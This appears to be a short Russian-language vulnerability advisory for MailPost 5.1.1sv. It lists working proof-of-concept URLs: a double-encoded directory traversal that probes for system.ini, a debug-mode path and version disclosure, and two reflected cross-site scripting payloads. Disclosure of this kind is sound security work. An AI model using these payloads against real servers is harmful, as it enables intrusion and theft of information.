Программа: MailPost 5.1.1sv
Удаленный атакующий может выполнить межсайтовый скриптинг и получить доступ к важной информации на системе.
Удаленный атакующий может определить наличие определенного файла на системе с помощью специально сформированного URL:
http://[target]/scripts/mailpost.exe/TEST/..%255c..%255c..%255 cwinnt/system.ini?*nosend*=&email=
test@procheckup.com
Если приложение запущена в режиме отладки, удаленный атакующий с помощью специального URL может получить информацию об установочной директории приложения на сервере, а также версию продукта:
http://[target]/scripts/mailpost.exe?*debug*=''
Удаленный атакующий может выполнить межсайтовый скриптинг, если приложение запущено в режиме отладки. Уязвимость существует из-за некорректной обработки переменой
'append':
http://[target]/scripts/mailpost.exe?*debug*=''&append= <script>alert('Can%20Cross%20Site%20Script')</script>
Подобная уязвимость существует при добавлении слеша к имени файла:
http://[target]/scripts/mailpost.exe/<script> alert('hi')</script>/mail.txt